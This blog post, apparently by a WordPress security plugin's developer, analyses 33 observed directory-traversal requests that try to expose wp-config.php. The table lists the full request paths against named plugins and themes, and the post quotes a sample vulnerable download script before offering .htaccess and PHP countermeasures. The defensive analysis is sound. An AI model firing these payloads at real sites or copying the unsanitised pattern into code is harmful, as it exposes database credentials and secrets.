Prevent exposure of wp-config.php

From July to September 2015, I observed 33 types of malicious requests on my site attempting to expose wp-config.php through vulnerable plugins and themes. I analyzed all of them to identify whether IP Geo Block can block them or not.

Unfortunately, I could not find the cause of every exposure, because most of those plugins and themes had already been removed from the WordPress repository. So I can’t say with full confidence, but only 2 of the 33 could be blocked by IP Geo Block 2.1.5 and under, even when the requests came from forbidden countries.

In this article, I should clarify how to prevent exposure of wp-config.php against such malicious requests.

Analysis of Attack Vectors

Before showing the results, I should explain the terms, which are the same as in the previous article.

Attack Vector = Type x Path

where the “Path” is categorized as below:

| Abbreviation of Path | Description |
|---|---|
| WP | It loads the WordPress core through wp-load.php. |
| PD | It is called Plugin Directly, without loading the WP core. |
| N/A | Unknown, because the source code is Not Available. |

Here’s the table of the 33 requests that attempted to expose wp-config.php on my site. Most of them were disclosed recently. IP Geo Block 2.1.5 and under can only protect the WP path; it cannot protect PD (and probably N/A), because those plugins and themes never load the WordPress core.

| Type | Path | Disclosed | Request |
|---|---|---|---|
| AFD | PD | 2015-08-10 | /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php |
| RFD | PD | 2015-07-16 | /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=../../../../wp-config.php |
| AFD | PD | 2015-07-12 | /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../wp-config.php |
| AFD | PD | 2015-07-09 | /wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php |
| RFD | PD | 2015-07-05 | /wp-content/plugins/image-export/download.php?file=../../../wp-config.php |
| AFD | PD | 2015-07-05 | /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php |
| RFD | WP | 2015-07-05 | /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php |
| RFD | WP | 2015-07-02 | /wp-content/plugins/wp-swimteam/include/user/download.php?file=../../../../../wp-config.php&filename=../../../../../wp-config.php&contenttype=text/html&transient=1&abspath=/usr/share/wordpress |
| AFD | PD | 2015-06-10 | /wp-content/plugins/history-collection/download.php?var=../../../wp-config.php |
| AFD | N/A | 2015-04-18 | /wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php |
| RFD | N/A | 2015-04-13 | /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php |
| AFD | PD | 2015-03-26 | /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php |
| LFD | N/A | 2015-02-16 | /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php |
| AFD | N/A | 2014-12-24 | /wp-content/themes/markant/download.php?file=../../wp-config.php |
| AFD | N/A | 2014-12-24 | /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php |
| AFD | N/A | 2014-12-24 | /wp-content/themes/felis/download.php?file=../wp-config.php |
| AFD | N/A | 2014-12-24 | /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php |
| AFD | N/A | 2014-12-24 | /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php |
| AFD | N/A | 2014-12-24 | /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php |
| AFD | N/A | 2014-12-24 | /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php |
| AFD | N/A | 2014-12-24 | /wp-content/themes/yakimabait/download.php?file=./wp-config.php |
| LFI | N/A | 2014-12-07 | /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php |
| AFD | N/A | 2014-12-06 | /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php |
| AFD | PD | 2014-09-09 | /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php |
| AFD | N/A | 2014-09-08 | /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php |
| AFD | N/A | 2014-09-08 | /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php |
| AFD | N/A | 2014-09-07 | /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php |
| AFD | N/A | 2014-09-07 | /wp-content/themes/epic/includes/download.php?file=wp-config.php |
| LFI | N/A | 2014-09-03 | /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php |
| LFI | N/A | 2014-04-14 | /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php |
| AFD | N/A | 2014-08-31 | /wp-content/themes/lote27/download.php?download=../../../wp-config.php |
| AFD | PD | 2014-08-01 | /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php |
| RFD | N/A | 2011-09-19 | /wp-content/plugins/filedownload/download.php?path=../../../wp-config.php&type=aplication/pdf |

What’s the cause?

As you can see, most of them have their own download script such as download.php. The typical OMG code in there looks like this:

<?php
// $file comes straight from the query string with no sanitization at all
$file = $_GET['file'];
// "../" sequences in $file walk out of the uploads directory, so a request
// such as ?file=../../../wp-config.php passes this check and is served as-is
if (file_exists('../../uploads/xxxx/'.$file)) {
    readfile('../../uploads/xxxx/'.$file);
    exit();
}
?>

This kind of vulnerability is exploited by a directory traversal attack: the script never checks that the resolved path stays inside the directory it intends to serve from.

I’m not sure why some authors tend to write such directly requested scripts without loading the WordPress core (do they worry about speed?), but they should know why so many WordPress plugins are vulnerable, and should absolutely use the WordPress framework unless they can keep their products secure on their own.

How to protect my site against such OMG code?

First and foremost, we should consider transforming the Path from PD and N/A to WP. If those plugins and themes loaded the WordPress core before they were executed, IP Geo Block would have a chance to block the attacks.

So we should force those plugins and themes to load wp-load.php. To achieve this, the .htaccess in the plugins directory can be configured to rewrite a request to rewrite.php with the following directives:

# BEGIN IP Geo Block
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /wp-content/plugins/ip-geo-block/
RewriteCond %{REQUEST_URI} !ip-geo-block/rewrite.php$
RewriteRule ^.*\.php$ rewrite.php [L]
</IfModule>
# END IP Geo Block

The path /wp-content/plugins/ip-geo-block/ in RewriteBase should be changed according to your site configuration. And here’s the example of .htaccess in the themes directory:

# BEGIN IP Geo Block
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /wp-content/plugins/ip-geo-block/
RewriteRule ^.*\.php$ rewrite.php [L]
</IfModule>
# END IP Geo Block

These rules rewrite any request for /wp-content/plugins/.../*.php or /wp-content/themes/.../*.php to rewrite.php in IP Geo Block, which loads wp-load.php so that the request is validated by country code or by WP-ZEP before the plugin or theme file runs.
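To make the mechanism concrete, here is an added illustration of what the front controller reached by those .htaccess rules has to do. This is not the plugin’s own rewrite.php; it assumes the file lives in wp-content/plugins/ip-geo-block/ and uses only the WordPress constants and functions named in the comments.

```php
<?php
// Added illustration of the front controller behind the .htaccess rules.
// NOT the plugin's own rewrite.php; the directory layout (this file in
// wp-content/plugins/ip-geo-block/) is assumed.

// 1. Load the WordPress core before anything else. Plugins hooked on 'init',
//    IP Geo Block's validation among them, run inside this require, so a
//    request that fails validation never reaches the plugin or theme file.
require_once dirname(__FILE__) . '/../../../wp-load.php';

/**
 * Map the originally requested URI to a .php file under wp-content,
 * or return null if the request should get a 404.
 */
function resolve_rewritten_target($request_uri, $content_dir, $content_url_path)
{
    $path = parse_url($request_uri, PHP_URL_PATH);
    if (!is_string($path) || strpos($path, $content_url_path . '/') !== 0) {
        return null;
    }
    $root   = realpath($content_dir);
    $target = realpath($content_dir . rawurldecode(substr($path, strlen($content_url_path))));
    if ($root === false || $target === false) {
        return null;
    }
    // Only *.php under plugins/ or themes/ is dispatched, never this file
    // itself and never anything that resolves outside wp-content.
    $allowed = strpos($target, $root . DIRECTORY_SEPARATOR . 'plugins' . DIRECTORY_SEPARATOR) === 0
            || strpos($target, $root . DIRECTORY_SEPARATOR . 'themes' . DIRECTORY_SEPARATOR) === 0;
    if (!$allowed || substr($target, -4) !== '.php' || !is_file($target)
        || $target === realpath(__FILE__)) {
        return null;
    }
    return $target;
}

// mod_rewrite leaves REQUEST_URI as the client sent it, so the original
// plugin/theme path is still available after the internal rewrite.
$request_uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
$target = resolve_rewritten_target(
    $request_uri,
    WP_CONTENT_DIR,                          // defined by WordPress
    parse_url(content_url(), PHP_URL_PATH)   // e.g. "/wp-content"
);

if ($target === null) {
    status_header(404);
    exit;
}

// 2. Hand over to the requested script. Changing the working directory keeps
//    relative paths such as '../../uploads/' behaving as on a direct request.
chdir(dirname($target));
require $target;
```

The important property is the ordering: the core, and with it every plugin hooked into WordPress, is loaded before the target script gets control, which is exactly what turns a PD or N/A path into a WP path in the table above.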

Another consideration, for the Type in the Attack Vector, is that IP Geo Block should filter out “malicious signatures” such as wp-config.php or passwd, to defend against attacks that come from permitted countries as well.

I’ll provide this functionality in the next release (maybe 2.2.0)!!